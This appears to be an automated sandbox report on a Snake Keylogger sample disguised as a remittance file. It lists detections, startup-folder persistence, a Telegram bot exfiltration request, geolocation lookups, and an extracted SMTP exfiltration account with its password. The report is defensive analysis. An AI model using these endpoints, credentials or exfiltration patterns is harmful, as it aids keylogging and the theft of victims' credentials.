Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
z84TTREMITTANCEUSD347_432_63.exe

Overview

General Information

Sample name:z84TTREMITTANCEUSD347_432_63.exe
Analysis ID:1518314
MD5:34280e3a145d8d865efedf422b568e46
SHA1:d5e2b2072a08a672d87446df36e513095945d151
SHA256:4ffad08e9b831394159944b7c719bd9a80efcde000ebfa788de1a23f64007b91
Tags:exeSnakeKeyloggeruser-Porcupine
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Sigma detected: Drops script at startup location
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Drops VBS files to the startup folder
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Generic Downloader
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • z84TTREMITTANCEUSD347_432_63.exe (PID: 612 cmdline: "C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe" MD5: 34280E3A145D8D865EFEDF422B568E46)
    • name.exe (PID: 3228 cmdline: "C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe" MD5: 34280E3A145D8D865EFEDF422B568E46)
      • RegSvcs.exe (PID: 6004 cmdline: "C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • wscript.exe (PID: 6444 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • name.exe (PID: 5744 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: 34280E3A145D8D865EFEDF422B568E46)
      • RegSvcs.exe (PID: 6488 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "wethem@aklaneah-sa.com", "Password": "Password:  )NYyffR0   ", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}
{"Exfil Mode": "SMTP", "Username": "wethem@aklaneah-sa.com", "Password": "Password:  )NYyffR0   ", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000003.00000002.4562656465.00000000025C1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000003.00000002.4560135222.000000000039D000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
            Click to see the 33 entries
            SourceRuleDescriptionAuthorStrings
            7.2.RegSvcs.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              7.2.RegSvcs.exe.400000.0.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                7.2.RegSvcs.exe.400000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0x2d5eb:$a1: get_encryptedPassword
                • 0x2d8f8:$a2: get_encryptedUsername
                • 0x2d409:$a3: get_timePasswordChanged
                • 0x2d504:$a4: get_passwordField
                • 0x2d601:$a5: set_encryptedPassword
                • 0x2ec8b:$a7: get_logins
                • 0x2ebee:$a10: KeyLoggerEventArgs
                • 0x2e853:$a11: KeyLoggerEventArgsEventHandler
                7.2.RegSvcs.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_DotNetProcHookDetects executables with potential process hoockingditekSHen
                • 0x2e20a:$s1: UnHook
                • 0x2e211:$s2: SetHook
                • 0x2e219:$s3: CallNextHook
                • 0x2e226:$s4: _hook
                6.2.name.exe.43c0000.1.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  Click to see the 25 entries

                  System Summary

                  barindex
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , ProcessId: 6444, ProcessName: wscript.exe
                  Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 208.91.198.143, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 6004, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49727
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , ProcessId: 6444, ProcessName: wscript.exe

                  Data Obfuscation

                  barindex
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\directory\name.exe, ProcessId: 3228, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-25T15:34:14.669336+020028033053Unknown Traffic192.168.2.549706188.114.97.3443TCP
                  2024-09-25T15:34:20.252908+020028033053Unknown Traffic192.168.2.549716188.114.97.3443TCP
                  2024-09-25T15:34:33.024873+020028033053Unknown Traffic192.168.2.549730188.114.97.3443TCP
                  2024-09-25T15:34:36.632789+020028033053Unknown Traffic192.168.2.549736188.114.97.3443TCP
                  2024-09-25T15:34:40.422975+020028033053Unknown Traffic192.168.2.549742188.114.97.3443TCP
                  2024-09-25T15:34:41.510510+020028033053Unknown Traffic192.168.2.549744188.114.97.3443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-25T15:34:13.196430+020028032742Potentially Bad Traffic192.168.2.549704193.122.130.080TCP
                  2024-09-25T15:34:14.071432+020028032742Potentially Bad Traffic192.168.2.549704193.122.130.080TCP
                  2024-09-25T15:34:15.196577+020028032742Potentially Bad Traffic192.168.2.549707193.122.130.080TCP
                  2024-09-25T15:34:31.649538+020028032742Potentially Bad Traffic192.168.2.549728193.122.130.080TCP
                  2024-09-25T15:34:32.446433+020028032742Potentially Bad Traffic192.168.2.549728193.122.130.080TCP
                  2024-09-25T15:34:33.540191+020028032742Potentially Bad Traffic192.168.2.549731193.122.130.080TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: z84TTREMITTANCEUSD347_432_63.exeAvira: detected
                  Source: http://aborters.duckdns.org:8081URL Reputation: Label: malware
                  Source: http://anotherarmy.dns.army:8081URL Reputation: Label: malware
                  Source: C:\Users\user\AppData\Local\directory\name.exeAvira: detection malicious, Label: HEUR/AGEN.1321293
                  Source: 00000003.00000002.4562656465.00000000025C1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "wethem@aklaneah-sa.com", "Password": "Password: )NYyffR0 ", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}
                  Source: 6.2.name.exe.43c0000.1.raw.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "wethem@aklaneah-sa.com", "Password": "Password: )NYyffR0 ", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: C:\Users\user\AppData\Local\directory\name.exeJoe Sandbox ML: detected
                  Source: z84TTREMITTANCEUSD347_432_63.exeJoe Sandbox ML: detected

                  Location Tracking

                  barindex
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: z84TTREMITTANCEUSD347_432_63.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49705 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49729 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49722 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49745 version: TLS 1.2
                  Source: Binary string: wntdll.pdbUGP source: name.exe, 00000002.00000003.2161626135.0000000004500000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000002.00000003.2161311195.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000003.2353536379.0000000004460000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000003.2353238654.0000000004600000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: name.exe, 00000002.00000003.2161626135.0000000004500000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000002.00000003.2161311195.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000003.2353536379.0000000004460000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000003.2353238654.0000000004600000.00000004.00001000.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,6_2_00452492
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_00442886
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,6_2_004788BD
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,6_2_004339B6
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,6_2_0045CAFA
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_00431A86
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,6_2_0044BD27
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0045DE8F FindFirstFileW,FindClose,6_2_0045DE8F
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_0044BF8B
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0246F8E9h3_2_0246F631
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0246FD41h3_2_0246FA88
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 061631E0h3_2_06162DC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06160D0Dh3_2_06160B30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06161697h3_2_06160B30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06162C19h3_2_06162968
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0616E0A9h3_2_0616DE00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_06160673
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0616E959h3_2_0616E6B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0616F209h3_2_0616EF60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0616CF49h3_2_0616CCA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0616D7F9h3_2_0616D550
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 061631E0h3_2_06162DC2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0616E501h3_2_0616E258
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0616EDB1h3_2_0616EB08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0616F661h3_2_0616F3B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0616FAB9h3_2_0616F810
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_06160853
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_06160040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0616D3A1h3_2_0616D0F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 061631E0h3_2_0616310E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0616DC51h3_2_0616D9A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 02BCF8E9h7_2_02BCF631
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 02BCFD41h7_2_02BCFA88
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0576E959h7_2_0576E6B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0576D7F9h7_2_0576D550
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 057631E0h7_2_05762DC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 057631E0h7_2_05762DBF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0576CF49h7_2_0576CCA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0576F209h7_2_0576EF60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0576E0A9h7_2_0576DE00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05762C19h7_2_05762968
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 057631E0h7_2_0576310E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0576DC51h7_2_0576D9A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h7_2_05760040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0576FAB9h7_2_0576F810
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0576D3A1h7_2_0576D0F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05760D0Dh7_2_05760B30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05761697h7_2_05760B30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0576EDB1h7_2_0576EB08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0576F661h7_2_0576F3B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0576E501h7_2_0576E258

                  Networking

                  barindex
                  Source: unknownDNS query: name: api.telegram.org
                  Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.name.exe.43c0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.name.exe.3b00000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: global trafficTCP traffic: 192.168.2.5:49727 -> 208.91.198.143:587
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:921702%0D%0ADate%20and%20Time:%2025/09/2024%20/%2020:20:23%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20921702%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:921702%0D%0ADate%20and%20Time:%2025/09/2024%20/%2021:39:44%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20921702%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 208.91.198.143 208.91.198.143
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                  Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                  Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
                  Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49704 -> 193.122.130.0:80
